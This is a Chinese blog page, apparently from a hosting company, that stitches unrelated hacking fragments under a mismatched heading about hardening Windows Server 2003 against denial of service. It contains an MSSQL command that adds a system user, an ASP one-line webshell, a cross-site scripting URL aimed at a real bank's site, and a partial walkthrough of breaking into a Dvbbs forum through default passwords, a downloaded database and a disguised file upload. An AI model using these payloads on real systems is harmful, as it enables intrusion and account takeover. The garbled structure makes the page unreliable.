风易博客

信息安全和网站备案是国家规定的法律义务，任何人不得以任何理由违反该项法律，同时任何人也不要存在任何侥幸心理避开该项法律。风易在线将严格按照国家规定，坚决切断一切有害信息的网站的接入服务，为国家和谐网络环境建设作出自己的贡献。

首先，DoS攻击有很多种，各个层都有自己的协议与服务，每个协议与服务都有可能受到DoS的攻击。目前我还没看到专门的文档专针对DoS攻击把防御方法进行说明。

不过可以根据下面的方法来作

How To Harden the TCP/IP Stack Against Denial of Service Attacks in Windows Server 2003

第一种方法:

declare @cmd INT 
exec sp_oacreate 'wscript.shell',@cmd output 
exec sp_oamethod @cmd,'run',null,'net user username password /add','0','true'

DB_ONER权限日志备分专用一句话木马 
<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

再发现的漏洞!

http://www.icbc.com.cn/click/adver/adver.jsp?para=javascript:alert('%BF%B4%BF%B4%B9%A4%D0%D0%C2%A9%B6%B4%2C%CA%C7%CE%DE%B4%A6%B2%BB%D4%DA%2C%D4%D9%BF%B4%CB%F9%CE%BD%B9%D9%B7%BD%BD%E2%CA%CD%2C%BF%C9%CE%BD%B5%CD%BC%AB%D6%AE%BC%AB%21');window.location.href="http://www.icbc.com.cn";

还是ICBC的官方网址,但把打开该地址呢?
有图为证:


做为上市银行,不应推卸责任,置广大用户的利益与不顾,而是该正视自己的问题,真正为广大用户着想!!!

前台admin密码admin888直接进入~后台admin密码admin888进不去~晕死.反正是新系统,估计数据库地址也没改~在地址后加/data/dvbbs7.mdb,呵呵,数据库出来了.查看数据库Dv_Log日志,得到后台密码adminadmin,进后台~
 按我几个月前的思路dv7.1应该是把asp文件头改成jpg或jif的文件头几位数字上传再恢复数据就可以的了,结果上传成功,恢复数据提示"备份的文件并非合法的数据库。"...
 再一想好像前段时间dv发布了个7.1的SP补丁的~估计把这个给补上了.郁闷,难道就这样没的玩了?反正也没事,干脆去把sp1的几个升级文件下载回来看看~
 下载完后打开/admin/data.asp这个文件,找到出错代码:
--------------------------------------------------------------------------------------------------------